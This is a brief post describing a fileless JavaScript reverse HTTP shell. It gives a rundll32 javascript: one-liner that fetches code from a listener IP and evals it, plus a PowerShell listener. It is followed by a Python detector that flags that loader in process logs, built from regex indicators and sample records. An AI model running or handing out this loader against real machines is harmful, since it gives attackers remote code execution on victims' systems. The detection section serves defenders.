Fileless JS reverse HTTP shell

All the code is here:

https://gist.github.com/subTee/f1603fa5c15d5f8825c0 


Run on the target machine (a single rundll32 command line; no file is written to disk, the JavaScript fetches the next stage from the listener and eval()s it):

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://反弹的IP/connect",false);h.Send();B=h.ResponseText;eval(B)

Run the PowerShell listener script locally:

PS E:\> .\JSRat.ps1 

Note: edit the matching line in the PS script, $Server = '本地监听的IP' #Listening IP. Change This., so that it points at the IP you are listening on.
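From the defender's side, the technique above leaves a very recognisable process-creation trace: rundll32.exe started with a javascript: URI, a reference to mshtml,RunHTMLApplication, a WinHttp.WinHttpRequest ActiveX object and an eval() of the response. The following is an added detection example written for this page; it is not part of the original post or the linked gist. The log-record format (Host=...|PID=...|Image=...|CommandLine=...), the host names, PIDs and the LISTENER_IP placeholder are all constructed for the example.

```python
"""
Added example: flag rundll32.exe process starts whose command line carries the
fileless javascript:/RunHTMLApplication loader pattern described in the post.
The log format, host names and PIDs below are constructed for this example.
"""
import re
from urllib.parse import unquote

# Indicators of the technique shown in the post, matched against the
# URL-decoded, whitespace-collapsed command line.
INDICATORS = [
    ("rundll32_javascript_uri", re.compile(r'rundll32(\.exe)?"?\s+javascript:', re.I)),
    ("mshtml_runhtmlapplication", re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I)),
    ("winhttp_activex", re.compile(r"ActiveXObject\(\s*[\"']WinHttp\.WinHttpRequest", re.I)),
    ("eval_of_response", re.compile(r"\beval\(", re.I)),
]

# Constructed process-creation records: one benign rundll32 use (Control Panel
# applet), the loader from the post with the listener IP replaced by a
# placeholder, and a non-rundll32 process that mentions "javascript:".
SAMPLE_LOG = [
    r'Host=WS01|PID=4120|Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'Host=WS01|PID=4188|Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://LISTENER_IP/connect",false);h.Send();B=h.ResponseText;eval(B)',
    r'Host=WS02|PID=912|Image=C:\Program Files\App\app.exe|CommandLine=app.exe javascript:console.log(1)',
]


def normalise(cmdline: str) -> str:
    """URL-decode (%20 -> space) and collapse whitespace so spacing tricks do not hide tokens."""
    return re.sub(r"\s+", " ", unquote(cmdline)).strip()


def match_indicators(cmdline: str) -> list:
    """Return the names of every indicator found in one command line."""
    text = normalise(cmdline)
    return [name for name, rx in INDICATORS if rx.search(text)]


def parse_log_line(line: str) -> dict:
    """Parse one 'key=value|key=value' record; only the first '=' of each field separates key from value."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def scan(lines: list) -> list:
    """Scan records and report rundll32.exe starts that carry the javascript: loader.

    The javascript: URI is required for a hit; the other indicators are listed
    alongside it so an analyst can see how much of the full chain is present.
    """
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if not rec.get("Image", "").lower().endswith("rundll32.exe"):
            continue
        found = match_indicators(rec.get("CommandLine", ""))
        if "rundll32_javascript_uri" in found:
            hits.append({"host": rec.get("Host"), "pid": rec.get("PID"), "indicators": found})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['host']} pid={hit['pid']}: {', '.join(hit['indicators'])}")
```

The javascript: URI on its own is the strongest signal, since legitimate rundll32 invocations name a DLL and an export rather than a URI; the WinHttpRequest and eval() indicators are there to grade the alert, and the URL-decoding step matters because the %20 in the posted command line would otherwise split the ActiveXObject token across a literal percent-encoding.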


The result looks like this:

[screenshot of the resulting session; image not reproduced here]
